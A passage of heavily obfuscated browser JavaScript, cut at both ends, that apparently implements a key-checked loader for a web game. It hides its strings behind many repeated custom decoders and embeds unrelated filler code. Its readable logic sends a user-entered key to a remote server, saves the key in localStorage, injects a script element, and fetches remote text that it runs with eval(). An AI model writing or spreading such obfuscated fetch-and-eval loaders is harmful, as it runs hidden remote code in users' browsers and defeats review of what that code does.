xya6Dqp=qOeh3Ug.length,tBJ48u,ilOuWSp,xGquxzw,kHlSG4N,YS5C61,FGqp_v,Ze0ESTw,NHoMtb8,ZbVmNQj,Vh2mDn;if(xya6Dqp<0x2)return LT_kr5[0x0];dnSsLOz(tBJ48u=Math.max(...qOeh3Ug),ilOuWSp=Math.min(...qOeh3Ug));if(tBJ48u===ilOuWSp)return LT_kr5[0x0];dnSsLOz(xGquxzw=Array(xya6Dqp-LT_kr5[0x1]).fill(Number.MAX_SAFE_INTEGER),kHlSG4N=Array(xya6Dqp-LT_kr5[0x1]).fill(Number.MIN_SAFE_INTEGER),YS5C61=Math.ceil((tBJ48u-ilOuWSp)/(xya6Dqp-LT_kr5[0x1])),FGqp_v=LT_kr5[0x0]);for(Ze0ESTw=LT_kr5[0x0];Ze0ESTw<xya6Dqp;Ze0ESTw++){if(qOeh3Ug[Ze0ESTw]===ilOuWSp||qOeh3Ug[Ze0ESTw]===tBJ48u)continue;dnSsLOz(FGqp_v=Math.floor((qOeh3Ug[Ze0ESTw]-ilOuWSp)/YS5C61),xGquxzw[FGqp_v]=Math.min(xGquxzw[FGqp_v],qOeh3Ug[Ze0ESTw]),kHlSG4N[FGqp_v]=Math.max(kHlSG4N[FGqp_v],qOeh3Ug[Ze0ESTw]))}dnSsLOz(NHoMtb8=Number.MIN_SAFE_INTEGER,ZbVmNQj=ilOuWSp);for(Vh2mDn=LT_kr5[0x0];Vh2mDn<xya6Dqp-LT_kr5[0x1];Vh2mDn++){if(xGquxzw[Vh2mDn]===Number.MAX_SAFE_INTEGER&&kHlSG4N[Vh2mDn]===Number.MIN_SAFE_INTEGER)continue;dnSsLOz(NHoMtb8=Math.max(NHoMtb8,xGquxzw[Vh2mDn]-ZbVmNQj),ZbVmNQj=kHlSG4N[Vh2mDn])}NHoMtb8=Math.max(NHoMtb8,tBJ48u-ZbVmNQj);return NHoMtb8};console.log(qOeh3Ug)}dnSsLOz(qOeh3Ug=function(...qOeh3Ug){yXZLWW2=qOeh3Ug;return Ze0ESTw[ilOuWSp].apply(this)},xya6Dqp=xGquxzw[ilOuWSp]);if(xya6Dqp){d7xJ7v(qOeh3Ug,xya6Dqp)}return qOeh3Ug}FGqp_v=FlmUjyW[ilOuWSp]||(FlmUjyW[ilOuWSp]=NHoMtb8())}else{function ZbVmNQj(ilOuWSp){var qOeh3Ug="!A<xDqwiL|PT0Jzv1V5*l%Yy/g>c$jn~M+^kRE@hm&HZ=4O;XCSa\"df]B9,[UNbur{I:2Q`)t7#GKW8?36(}poF.s_e",xya6Dqp,xGquxzw,tBJ48u,kHlSG4N,YS5C61,FGqp_v,Ze0ESTw;dnSsLOz(xya6Dqp=""+(ilOuWSp||""),xGquxzw=xya6Dqp.length,tBJ48u=[],kHlSG4N=LT_kr5[0x0],YS5C61=LT_kr5[0x0],FGqp_v=-LT_kr5[0x1]);for(Ze0ESTw=LT_kr5[0x0];Ze0ESTw<xGquxzw;Ze0ESTw++){var NHoMtb8=qOeh3Ug.indexOf(xya6Dqp[Ze0ESTw]);if(NHoMtb8===-LT_kr5[0x1])continue;if(FGqp_v<LT_kr5[0x0]){FGqp_v=NHoMtb8}else{dnSsLOz(FGqp_v+=NHoMtb8*LT_kr5[0xc],kHlSG4N|=FGqp_v<<YS5C61,YS5C61+=(FGqp_v&LT_kr5[0xd])>LT_kr5[0xe]?LT_kr5[0xf]:LT_kr5[0x10]);do{dnSsLOz(tBJ48u.push(kHlSG4N&LT_kr5[0x3]),kHlSG4N>>=LT_kr5[0x2],YS5C61-=LT_kr5[0x2])}while(YS5C61>LT_kr5[0x9]);FGqp_v=-LT_kr5[0x1]}}if(FGqp_v>-LT_kr5[0x1]){tBJ48u.push((kHlSG4N|FGqp_v<<YS5C61)&LT_kr5[0x3])}return jXLK_x(tBJ48u)}function Vh2mDn(ilOuWSp){if(typeof QKZcRD[ilOuWSp]===LT_kr5[0x5]){return QKZcRD[ilOuWSp]=ZbVmNQj(k8G48O[ilOuWSp])}return QKZcRD[ilOuWSp]}if(Vh2mDn(0x74)in GV8SE2){_hEDa_5()}function _hEDa_5(){}FGqp_v=Ze0ESTw[ilOuWSp]()}if(xya6Dqp===kHlSG4N(0x75)){function wSITFCV(ilOuWSp){var qOeh3Ug="KDdx<;67F=cva`f2UnjOb~|0PZJY,ei\"1Im_V#N{CuMt%s[kQqzHW]l9y+8&3L^w?h*RE/4A>oXrBGp(.!:g$)ST@5}",xya6Dqp,xGquxzw,tBJ48u,kHlSG4N,YS5C61,FGqp_v,Ze0ESTw;dnSsLOz(xya6Dqp=""+(ilOuWSp||""),xGquxzw=xya6Dqp.length,tBJ48u=[],kHlSG4N=LT_kr5[0x0],YS5C61=LT_kr5[0x0],FGqp_v=-LT_kr5[0x1]);for(Ze0ESTw=LT_kr5[0x0];Ze0ESTw<xGquxzw;Ze0ESTw++){var NHoMtb8=qOeh3Ug.indexOf(xya6Dqp[Ze0ESTw]);if(NHoMtb8===-LT_kr5[0x1])continue;if(FGqp_v<LT_kr5[0x0]){FGqp_v=NHoMtb8}else{dnSsLOz(FGqp_v+=NHoMtb8*LT_kr5[0xc],kHlSG4N|=FGqp_v<<YS5C61,YS5C61+=(FGqp_v&LT_kr5[0xd])>LT_kr5[0xe]?LT_kr5[0xf]:LT_kr5[0x10]);do{dnSsLOz(tBJ48u.push(kHlSG4N&LT_kr5[0x3]),kHlSG4N>>=LT_kr5[0x2],YS5C61-=LT_kr5[0x2])}while(YS5C61>LT_kr5[0x9]);FGqp_v=-LT_kr5[0x1]}}if(FGqp_v>-LT_kr5[0x1]){tBJ48u.push((kHlSG4N|FGqp_v<<YS5C61)&LT_kr5[0x3])}return jXLK_x(tBJ48u)}function zNphJ3(ilOuWSp){if(typeof QKZcRD[ilOuWSp]===LT_kr5[0x5]){return QKZcRD[ilOuWSp]=wSITFCV(k8G48O[ilOuWSp])}return QKZcRD[ilOuWSp]}return{[zNphJ3(0x76)]:FGqp_v}}else{return FGqp_v}}const xya6Dqp=qOeh3Ug(0x77),xGquxzw=qOeh3Ug(0x78);let tBJ48u=LT_kr5[0x11],kHlSG4N;function YS5C61(){function FlmUjyW(FlmUjyW){var yXZLWW2="=bdkWYHDnTeF7J#sVQ+\"}@j0<u^;vC8E`h!1U5$(]9:l?3L_K>G,S4|XzOI{g&r)[/*.wyaqx%cP~Bpt2foZmAMNi6R",ilOuWSp,qOeh3Ug,pDeD_a,xya6Dqp,xGquxzw,tBJ48u,kHlSG4N;dnSsLOz(ilOuWSp=""+(FlmUjyW||""),qOeh3Ug=ilOuWSp.length,pDeD_a=[],xya6Dqp=LT_kr5[0x0],xGquxzw=LT_kr5[0x0],tBJ48u=-LT_kr5[0x1]);for(kHlSG4N=LT_kr5[0x0];kHlSG4N<qOeh3Ug;kHlSG4N++){var YS5C61=yXZLWW2.indexOf(ilOuWSp[kHlSG4N]);if(YS5C61===-LT_kr5[0x1])continue;if(tBJ48u<LT_kr5[0x0]){tBJ48u=YS5C61}else{dnSsLOz(tBJ48u+=YS5C61*LT_kr5[0xc],xya6Dqp|=tBJ48u<<xGquxzw,xGquxzw+=(tBJ48u&LT_kr5[0xd])>LT_kr5[0xe]?LT_kr5[0xf]:LT_kr5[0x10]);do{dnSsLOz(pDeD_a.push(xya6Dqp&LT_kr5[0x3]),xya6Dqp>>=LT_kr5[0x2],xGquxzw-=LT_kr5[0x2])}while(xGquxzw>LT_kr5[0x9]);tBJ48u=-LT_kr5[0x1]}}if(tBJ48u>-LT_kr5[0x1]){pDeD_a.push((xya6Dqp|tBJ48u<<xGquxzw)&LT_kr5[0x3])}return jXLK_x(pDeD_a)}function yXZLWW2(yXZLWW2){if(typeof QKZcRD[yXZLWW2]===LT_kr5[0x5]){return QKZcRD[yXZLWW2]=FlmUjyW(k8G48O[yXZLWW2])}return QKZcRD[yXZLWW2]}if(!tBJ48u){return}kHlSG4N[qOeh3Ug(0x79)]();const ilOuWSp=document[qOeh3Ug(0x7a)](qOeh3Ug(0x7b));dnSsLOz(ilOuWSp[yXZLWW2(0x7c)]=tBJ48u,ilOuWSp[yXZLWW2(0x7d)]=yXZLWW2(0x7e),ilOuWSp[yXZLWW2(LT_kr5[0x1a])]=LT_kr5[0x1f],document[yXZLWW2(LT_kr5[0x1b])][yXZLWW2(0x81)](ilOuWSp),ilOuWSp[yXZLWW2(0x82)]=()=>{function FlmUjyW(FlmUjyW){var yXZLWW2="atE.8:yM$Vc%9~&TGxXw)#\"Z[,1(v<@Y_}=F{R/3ShzWKuU4J]m`?>bCs;f+56g!BL|^Pje*27HDriNAOnIlQodpkq0",ilOuWSp,qOeh3Ug,pDeD_a,xya6Dqp,xGquxzw,tBJ48u,kHlSG4N;dnSsLOz(ilOuWSp=""+(FlmUjyW||""),qOeh3Ug=ilOuWSp.length,pDeD_a=[],xya6Dqp=LT_kr5[0x0],xGquxzw=LT_kr5[0x0],tBJ48u=-LT_kr5[0x1]);for(kHlSG4N=LT_kr5[0x0];kHlSG4N<qOeh3Ug;kHlSG4N++){var YS5C61=yXZLWW2.indexOf(ilOuWSp[kHlSG4N]);if(YS5C61===-LT_kr5[0x1])continue;if(tBJ48u<LT_kr5[0x0]){tBJ48u=YS5C61}else{dnSsLOz(tBJ48u+=YS5C61*LT_kr5[0xc],xya6Dqp|=tBJ48u<<xGquxzw,xGquxzw+=(tBJ48u&LT_kr5[0xd])>LT_kr5[0xe]?LT_kr5[0xf]:LT_kr5[0x10]);do{dnSsLOz(pDeD_a.push(xya6Dqp&LT_kr5[0x3]),xya6Dqp>>=LT_kr5[0x2],xGquxzw-=LT_kr5[0x2])}while(xGquxzw>LT_kr5[0x9]);tBJ48u=-LT_kr5[0x1]}}if(tBJ48u>-LT_kr5[0x1]){pDeD_a.push((xya6Dqp|tBJ48u<<xGquxzw)&LT_kr5[0x3])}return jXLK_x(pDeD_a)}function yXZLWW2(yXZLWW2){if(typeof QKZcRD[yXZLWW2]===LT_kr5[0x5]){return QKZcRD[yXZLWW2]=FlmUjyW(k8G48O[yXZLWW2])}return QKZcRD[yXZLWW2]}if(typeof LoadAfterGameLoad===yXZLWW2(LT_kr5[0x1c])){LoadAfterGameLoad()}if(document[yXZLWW2(0x84)]===yXZLWW2(0x85)&&typeof window[yXZLWW2(0x86)]===yXZLWW2(LT_kr5[0x1c])){function ilOuWSp(FlmUjyW){var yXZLWW2="OAub;._y6d?el8$%#TW!VhfZ&)|Gk:BpR1aNqmsg*izYocn`r@(QX]j^Jx+H>IM[2Kv\"U950P=LC47DE/F}Stw{3,<~",ilOuWSp,qOeh3Ug,pDeD_a,xya6Dqp,xGquxzw,tBJ48u,kHlSG4N;dnSsLOz(ilOuWSp=""+(FlmUjyW||""),qOeh3Ug=ilOuWSp.length,pDeD_a=[],xya6Dqp=LT_kr5[0x0],xGquxzw=LT_kr5[0x0],tBJ48u=-LT_kr5[0x1]);for(kHlSG4N=LT_kr5[0x0];kHlSG4N<qOeh3Ug;kHlSG4N++){var YS5C61=yXZLWW2.indexOf(ilOuWSp[kHlSG4N]);if(YS5C61===-LT_kr5[0x1])continue;if(tBJ48u<LT_kr5[0x0]){tBJ48u=YS5C61}else{dnSsLOz(tBJ48u+=YS5C61*LT_kr5[0xc],xya6Dqp|=tBJ48u<<xGquxzw,xGquxzw+=(tBJ48u&LT_kr5[0xd])>LT_kr5[0xe]?LT_kr5[0xf]:LT_kr5[0x10]);do{dnSsLOz(pDeD_a.push(xya6Dqp&LT_kr5[0x3]),xya6Dqp>>=LT_kr5[0x2],xGquxzw-=LT_kr5[0x2])}while(xGquxzw>LT_kr5[0x9]);tBJ48u=-LT_kr5[0x1]}}if(tBJ48u>-LT_kr5[0x1]){pDeD_a.push((xya6Dqp|tBJ48u<<xGquxzw)&LT_kr5[0x3])}return jXLK_x(pDeD_a)}function qOeh3Ug(FlmUjyW){if(typeof QKZcRD[FlmUjyW]===LT_kr5[0x5]){return QKZcRD[FlmUjyW]=ilOuWSp(k8G48O[FlmUjyW])}return QKZcRD[FlmUjyW]}window[qOeh3Ug(0x87)]()}})}function FGqp_v(FlmUjyW,yXZLWW2,ilOuWSp,pDeD_a){if(!pDeD_a){pDeD_a=function(FlmUjyW){if(typeof QKZcRD[FlmUjyW]===LT_kr5[0x5]){return QKZcRD[FlmUjyW]=ilOuWSp(k8G48O[FlmUjyW])}return QKZcRD[FlmUjyW]}}if(!ilOuWSp){ilOuWSp=function(FlmUjyW){var yXZLWW2="K(DEY)G_24#uhS[FH%5p9;1wBrU>6{!|ZoXfLgV:]qjd?@IeJWCk=Qi8x0ztP^&a3lsnc7NR}<OM$,*`b+yTA.~v/\"m",ilOuWSp,pDeD_a,qOeh3Ug,xya6Dqp,xGquxzw,tBJ48u,kHlSG4N;dnSsLOz(ilOuWSp=""+(FlmUjyW||""),pDeD_a=ilOuWSp.length,qOeh3Ug=[],xya6Dqp=LT_kr5[0x0],xGquxzw=LT_kr5[0x0],tBJ48u=-LT_kr5[0x1]);for(kHlSG4N=LT_kr5[0x0];kHlSG4N<pDeD_a;kHlSG4N++){var YS5C61=yXZLWW2.indexOf(ilOuWSp[kHlSG4N]);if(YS5C61===-LT_kr5[0x1])continue;if(tBJ48u<LT_kr5[0x0]){tBJ48u=YS5C61}else{dnSsLOz(tBJ48u+=YS5C61*LT_kr5[0xc],xya6Dqp|=tBJ48u<<xGquxzw,xGquxzw+=(tBJ48u&LT_kr5[0xd])>LT_kr5[0xe]?LT_kr5[0xf]:LT_kr5[0x10]);do{dnSsLOz(qOeh3Ug.push(xya6Dqp&LT_kr5[0x3]),xya6Dqp>>=LT_kr5[0x2],xGquxzw-=LT_kr5[0x2])}while(xGquxzw>LT_kr5[0x9]);tBJ48u=-LT_kr5[0x1]}}if(tBJ48u>-LT_kr5[0x1]){qOeh3Ug.push((xya6Dqp|tBJ48u<<xGquxzw)&LT_kr5[0x3])}return jXLK_x(qOeh3Ug)}}fetch(FlmUjyW)[qOeh3Ug(0x88)](FlmUjyW=>{if(!FlmUjyW.ok){function yXZLWW2(FlmUjyW){var yXZLWW2="OoAnlR$JNfh&iVPKU9B_3C#SQD=wp%b:aT@y*Estv5Wz)x{r}q1kXF(Gg|M\"mIL4.2],Z+?j<uHedY!0>~[67/;c^8`",ilOuWSp,pDeD_a,qOeh3Ug,xya6Dqp,xGquxzw,tBJ48u,kHlSG4N;dnSsLOz(ilOuWSp=""+(FlmUjyW||""),pDeD_a=ilOuWSp.length,qOeh3Ug=[],xya6Dqp=LT_kr5[0x0],xGquxzw=LT_kr5[0x0],tBJ48u=-LT_kr5[0x1]);for(kHlSG4N=LT_kr5[0x0];kHlSG4N<pDeD_a;kHlSG4N++){var YS5C61=yXZLWW2.indexOf(ilOuWSp[kHlSG4N]);if(YS5C61===-LT_kr5[0x1])continue;if(tBJ48u<LT_kr5[0x0]){tBJ48u=YS5C61}else{dnSsLOz(tBJ48u+=YS5C61*LT_kr5[0xc],xya6Dqp|=tBJ48u<<xGquxzw,xGquxzw+=(tBJ48u&LT_kr5[0xd])>LT_kr5[0xe]?LT_kr5[0xf]:LT_kr5[0x10]);do{dnSsLOz(qOeh3Ug.push(xya6Dqp&LT_kr5[0x3]),xya6Dqp>>=LT_kr5[0x2],xGquxzw-=LT_kr5[0x2])}while(xGquxzw>LT_kr5[0x9]);tBJ48u=-LT_kr5[0x1]}}if(tBJ48u>-LT_kr5[0x1]){qOeh3Ug.push((xya6Dqp|tBJ48u<<xGquxzw)&LT_kr5[0x3])}return jXLK_x(qOeh3Ug)}function ilOuWSp(FlmUjyW){if(typeof QKZcRD[FlmUjyW]===LT_kr5[0x5]){return QKZcRD[FlmUjyW]=yXZLWW2(k8G48O[FlmUjyW])}return QKZcRD[FlmUjyW]}throw new Error(ilOuWSp(0x89)+FlmUjyW[ilOuWSp(0x8a)])}return FlmUjyW[qOeh3Ug(0x8b)]()})[pDeD_a(0x8c)](FlmUjyW=>{dnSsLOz(eval(FlmUjyW),yXZLWW2())})[pDeD_a(0x8d)](FlmUjyW=>{function yXZLWW2(FlmUjyW){var yXZLWW2="*.)FMdN&[xAo7B:9^>=(@ig5hqzw$a#,lt<QE3vCIOKnsXT`4WDP}J/\"yRj8ZbHu_~!L%+eGSrf2Up1Y6|m]c0?{V;k",ilOuWSp,pDeD_a,qOeh3Ug,xya6Dqp,xGquxzw,tBJ48u,kHlSG4N;dnSsLOz(ilOuWSp=""+(FlmUjyW||""),pDeD_a=ilOuWSp.length,qOeh3Ug=[],xya6Dqp=LT_kr5[0x0],xGquxzw=LT_kr5[0x0],tBJ48u=-LT_kr5[0x1]);for(kHlSG4N=LT_kr5[0x0];kHlSG4N<pDeD_a;kHlSG4N++){var YS5C61=yXZLWW2.indexOf(ilOuWSp[kHlSG4N]);if(YS5C61===-LT_kr5[0x1])continue;if(tBJ48u<LT_kr5[0x0]){tBJ48u=YS5C61}else{dnSsLOz(tBJ48u+=YS5C61*LT_kr5[0xc],xya6Dqp|=tBJ48u<<xGquxzw,xGquxzw+=(tBJ48u&LT_kr5[0xd])>LT_kr5[0xe]?LT_kr5[0xf]:LT_kr5[0x10]);do{dnSsLOz(qOeh3Ug.push(xya6Dqp&LT_kr5[0x3]),xya6Dqp>>=LT_kr5[0x2],xGquxzw-=LT_kr5[0x2])}while(xGquxzw>LT_kr5[0x9]);tBJ48u=-LT_kr5[0x1]}}if(tBJ48u>-LT_kr5[0x1]){qOeh3Ug.push((xya6Dqp|tBJ48u<<xGquxzw)&LT_kr5[0x3])}return jXLK_x(qOeh3Ug)}function ilOuWSp(FlmUjyW){if(typeof QKZcRD[FlmUjyW]===LT_kr5[0x5]){return QKZcRD[FlmUjyW]=yXZLWW2(k8G48O[FlmUjyW])}return QKZcRD[FlmUjyW]}dnSsLOz(console[ilOuWSp(0x8e)](ilOuWSp(0x8f),FlmUjyW),YS5C61())})}async function Gpx24X5(){function FlmUjyW(FlmUjyW){var yXZLWW2="i8VqAkauS]!IWK.XfBn>FhY1lt4Jv~,goxw:%;+0&279CD)p=M#[$?jc6QUN\"rEdOT<z@G|5PHZ_/*bRy^({ms`3}Le",ilOuWSp,qOeh3Ug,pDeD_a,tBJ48u,kHlSG4N,Gpx24X5,Ze0ESTw;dnSsLOz(ilOuWSp=""+(FlmUjyW||""),qOeh3Ug=ilOuWSp.length,pDeD_a=[],tBJ48u=LT_kr5[0x0],kHlSG4N=LT_kr5[0x0],Gpx24X5=-LT_kr5[0x1]);for(Ze0ESTw=LT_kr5[0x0];Ze0ESTw<qOeh3Ug;Ze0ESTw++){var NHoMtb8=yXZLWW2.indexOf(ilOuWSp[Ze0ESTw]);if(NHoMtb8===-LT_kr5[0x1])continue;if(Gpx24X5<LT_kr5[0x0]){Gpx24X5=NHoMtb8}else{dnSsLOz(Gpx24X5+=NHoMtb8*LT_kr5[0xc],tBJ48u|=Gpx24X5<<kHlSG4N,kHlSG4N+=(Gpx24X5&LT_kr5[0xd])>LT_kr5[0xe]?LT_kr5[0xf]:LT_kr5[0x10]);do{dnSsLOz(pDeD_a.push(tBJ48u&LT_kr5[0x3]),tBJ48u>>=LT_kr5[0x2],kHlSG4N-=LT_kr5[0x2])}while(kHlSG4N>LT_kr5[0x9]);Gpx24X5=-LT_kr5[0x1]}}if(Gpx24X5>-LT_kr5[0x1]){pDeD_a.push((tBJ48u|Gpx24X5<<kHlSG4N)&LT_kr5[0x3])}return jXLK_x(pDeD_a)}function yXZLWW2(yXZLWW2){if(typeof QKZcRD[yXZLWW2]===LT_kr5[0x5]){return QKZcRD[yXZLWW2]=FlmUjyW(k8G48O[yXZLWW2])}return QKZcRD[yXZLWW2]}const ilOuWSp=document[yXZLWW2(LT_kr5[0x1d])](yXZLWW2(0x91)),qOeh3Ug=ilOuWSp[yXZLWW2(0x92)][yXZLWW2(0x93)](),pDeD_a=document[yXZLWW2(LT_kr5[0x1d])](yXZLWW2(0x94)),tBJ48u=document[yXZLWW2(LT_kr5[0x1d])](yXZLWW2(0x95));if(!qOeh3Ug){function kHlSG4N(FlmUjyW){var yXZLWW2="6`y*{>#~x_572QG/J?|L0mS\",FT}a91(;hql[HznX<w^])%$!NkUBAEC.YOM&4:sgbr=IKj8evRW+idPVD@tfpZ3ocu",ilOuWSp,qOeh3Ug,pDeD_a,tBJ48u,kHlSG4N,Gpx24X5,Ze0ESTw;dnSsLOz(ilOuWSp=""+(FlmUjyW||""),qOeh3Ug=ilOuWSp.length,pDeD_a=[],tBJ48u=LT_kr5[0x0],kHlSG4N=LT_kr5[0x0],Gpx24X5=-LT_kr5[0x1]);for(Ze0ESTw=LT_kr5[0x0];Ze0ESTw<qOeh3Ug;Ze0ESTw++){var NHoMtb8=yXZLWW2.indexOf(ilOuWSp[Ze0ESTw]);if(NHoMtb8===-LT_kr5[0x1])continue;if(Gpx24X5<LT_kr5[0x0]){Gpx24X5=NHoMtb8}else{dnSsLOz(Gpx24X5+=NHoMtb8*LT_kr5[0xc],tBJ48u|=Gpx24X5<<kHlSG4N,kHlSG4N+=(Gpx24X5&LT_kr5[0xd])>LT_kr5[0xe]?LT_kr5[0xf]:LT_kr5[0x10]);do{dnSsLOz(pDeD_a.push(tBJ48u&LT_kr5[0x3]),tBJ48u>>=LT_kr5[0x2],kHlSG4N-=LT_kr5[0x2])}while(kHlSG4N>LT_kr5[0x9]);Gpx24X5=-LT_kr5[0x1]}}if(Gpx24X5>-LT_kr5[0x1]){pDeD_a.push((tBJ48u|Gpx24X5<<kHlSG4N)&LT_kr5[0x3])}return jXLK_x(pDeD_a)}function Gpx24X5(FlmUjyW){if(typeof QKZcRD[FlmUjyW]===LT_kr5[0x5]){return QKZcRD[FlmUjyW]=kHlSG4N(k8G48O[FlmUjyW])}return QKZcRD[FlmUjyW]}dnSsLOz(pDeD_a[yXZLWW2(LT_kr5[0x1e])]=Gpx24X5(0x97),pDeD_a[Gpx24X5(0x98)][Gpx24X5(0x99)]=Gpx24X5(0x9a));return}dnSsLOz(pDeD_a[yXZLWW2(LT_kr5[0x1e])]=yXZLWW2(0x9b),pDeD_a[yXZLWW2(0x9c)][yXZLWW2(0x9d)]=yXZLWW2(0x9e),tBJ48u[yXZLWW2(LT_kr5[0x20])]=LT_kr5[0x1f],ilOuWSp[yXZLWW2(LT_kr5[0x20])]=LT_kr5[0x1f]);try{function Ze0ESTw(FlmUjyW){var yXZLWW2="/<}7~*[z8Lu{2,sqD1r(@Pm|R+pYO^A;vV#nQc$5F=ikZ>TXdhjI`wb_.SNx]0:M!J6&fyU%K4)lto3?Ea9g\"GHeWBC",ilOuWSp,qOeh3Ug,pDeD_a,tBJ48u,kHlSG4N,Gpx24X5,Ze0ESTw;dnSsLOz(ilOuWSp=""+(FlmUjyW||""),qOeh3Ug=ilOuWSp.length,pDeD_a=[],tBJ48u=LT_kr5[0x0],kHlSG4N=LT_kr5[0x0],Gpx24X5=-LT_kr5[0x1]);for(Ze0ESTw=LT_kr5[0x0];Ze0ESTw<qOeh3Ug;Ze0ESTw++){var NHoMtb8=yXZLWW2.indexOf(ilOuWSp[Ze0ESTw]);if(NHoMtb8===-LT_kr5[0x1])continue;if(Gpx24X5<LT_kr5[0x0]){Gpx24X5=NHoMtb8}else{dnSsLOz(Gpx24X5+=NHoMtb8*LT_kr5[0xc],tBJ48u|=Gpx24X5<<kHlSG4N,kHlSG4N+=(Gpx24X5&LT_kr5[0xd])>LT_kr5[0xe]?LT_kr5[0xf]:LT_kr5[0x10]);do{dnSsLOz(pDeD_a.push(tBJ48u&LT_kr5[0x3]),tBJ48u>>=LT_kr5[0x2],kHlSG4N-=LT_kr5[0x2])}while(kHlSG4N>LT_kr5[0x9]);Gpx24X5=-LT_kr5[0x1]}}if(Gpx24X5>-LT_kr5[0x1]){pDeD_a.push((tBJ48u|Gpx24X5<<kHlSG4N)&LT_kr5[0x3])}return jXLK_x(pDeD_a)}function NHoMtb8(FlmUjyW){if(typeof QKZcRD[FlmUjyW]===LT_kr5[0x5]){return QKZcRD[FlmUjyW]=Ze0ESTw(k8G48O[FlmUjyW])}return QKZcRD[FlmUjyW]}const ZbVmNQj=await fetch(""+xya6Dqp+yXZLWW2(0xa0)+qOeh3Ug),GV8SE2=await ZbVmNQj[NHoMtb8(0xa1)]();if(GV8SE2[NHoMtb8(0xa2)]===NHoMtb8(0xa3)){function d7xJ7v(FlmUjyW){var yXZLWW2="c%AKkbaV_Q|mTP}*;@u#oI?g{s19p=Bq/N3^UEW]62v5Y[O`Lt:4zMy,Gx~>nlZSr+F.fDC$wd\"i<j(&eHh87)XR!J0",ilOuWSp,qOeh3Ug,pDeD_a,tBJ48u,kHlSG4N,Gpx24X5,Ze0ESTw;dnSsLOz(ilOuWSp=""+(FlmUjyW||""),qOeh3Ug=ilOuWSp.length,pDeD_a=[],tBJ48u=LT_kr5[0x0],kHlSG4N=LT_kr5[0x0],Gpx24X5=-LT_kr5[0x1]);for(Ze0ESTw=LT_kr5[0x0];Ze0ESTw<qOeh3Ug;Ze0ESTw++){var NHoMtb8=yXZLWW2.indexOf(ilOuWSp[Ze0ESTw]);if(NHoMtb8===-LT_kr5[0x1])continue;if(Gpx24X5<LT_kr5[0x0]){Gpx24X5=NHoMtb8}else{dnSsLOz(Gpx24X5+=NHoMtb8*LT_kr5[0xc],tBJ48u|=Gpx24X5<<kHlSG4N,kHlSG4N+=(Gpx24X5&LT_kr5[0xd])>LT_kr5[0xe]?LT_kr5[0xf]:LT_kr5[0x10]);do{dnSsLOz(pDeD_a.push(tBJ48u&LT_kr5[0x3]),tBJ48u>>=LT_kr5[0x2],kHlSG4N-=LT_kr5[0x2])}while(kHlSG4N>LT_kr5[0x9]);Gpx24X5=-LT_kr5[0x1]}}if(Gpx24X5>-LT_kr5[0x1]){pDeD_a.push((tBJ48u|Gpx24X5<<kHlSG4N)&LT_kr5[0x3])}return jXLK_x(pDeD_a)}function r7jR5C(FlmUjyW){if(typeof QKZcRD[FlmUjyW]===LT_kr5[0x5]){return QKZcRD[FlmUjyW]=d7xJ7v(k8G48O[FlmUjyW])}return QKZcRD[FlmUjyW]}dnSsLOz(localStorage[NHoMtb8(0xa4)](xGquxzw,qOeh3Ug),document[r7jR5C(0xa5)](r7jR5C(0xa6))[r7jR5C(0xa7)](),FGqp_v(GV8SE2[r7jR5C(0xa8)],YS5C61))}else{function RhsuBU(FlmUjyW){var yXZLWW2="|PMFGfIZYhnOKDlU*g+z7~;d30!S(L8?yb#_2u1t]vr5Ce@Wp:`)iERk<H[}/>%Bw\"A^&sJaT=jV.6x$,{XQoN9c4mq",ilOuWSp,qOeh3Ug,pDeD_a,tBJ48u,kHlSG4N,Gpx24X5,Ze0ESTw;dnSsLOz(ilOuWSp=""+(FlmUjyW||""),qOeh3Ug=ilOuWSp.length,pDeD_a=[],tBJ48u=LT_kr5[0x0],kHlSG4N=LT_kr5[0x0],Gpx24X5=-LT_kr5[0x1]);for(Ze0ESTw=LT_kr5[0x0];Ze0ESTw<qOeh3Ug;Ze0ESTw++){var NHoMtb8=yXZLWW2.indexOf(ilOuWSp[Ze0ESTw]);if(NHoMtb8===-LT_kr5[0x1])continue;if(Gpx24X5<LT_kr5[0x0]){Gpx24X5=NHoMtb8}else{dnSsLOz(Gpx24X5+=NHoMtb8*LT_kr5[0xc],tBJ48u|=Gpx24X5<<kHlSG4N,kHlSG4N+=(Gpx24X5&LT_kr5[0xd])>LT_kr5[0xe]?LT_kr5[0xf]:LT_kr5[0x10]);do{dnSsLOz(pDeD_a.push(tBJ48u&LT_kr5[0x3]),tBJ48u>>=LT_kr5[0x2],kHlSG4N-=LT_kr5[0x2])}while(kHlSG4N>LT_kr5[0x9]);Gpx24X5=-LT_kr5[0x1]}}if(Gpx24X5>-LT_kr5[0x1]){pDeD_a.push((tBJ48u|Gpx24X5<<kHlSG4N)&LT_kr5[0x3])}return jXLK_x(pDeD_a)}function ghDgcJ(FlmUjyW){if(typeof QKZcRD[FlmUjyW]===LT_kr5[0x5]){return QKZcRD[FlmUjyW]=RhsuBU(k8G48O[FlmUjyW])}return QKZcRD[FlmUjyW]}dnSsLOz(pDeD_a[ghDgcJ(0xa9)]=ghDgcJ(0xaa),pDeD_a[ghDgcJ(0xab)][ghDgcJ(0xac)]=ghDgcJ(0xad))}}catch(_VJXKg){function doWCbVy(FlmUjyW){var yXZLWW2="NPWjcTqaCDULRbenFimEkhBdfgOGHYVtospr!|9A[M0ZlI+62.1X<KxQS@]\"z`w5=&}){4:#/>~3v;$_y^?7*%,(8uJ",ilOuWSp,qOeh3Ug,pDeD_a,tBJ48u,kHlSG4N,Gpx24X5,Ze0ESTw;dnSsLOz(ilOuWSp=""+(FlmUjyW||""),qOeh3Ug=ilOuWSp.length,pDeD_a=[],tBJ48u=LT_kr5[0x0],kHlSG4N=LT_kr5[0x0],Gpx24X5=-LT_kr5[0x1]);for(Ze0ESTw=LT_kr5[0x0];Ze0ESTw<qOeh3Ug;Ze0ESTw++){var 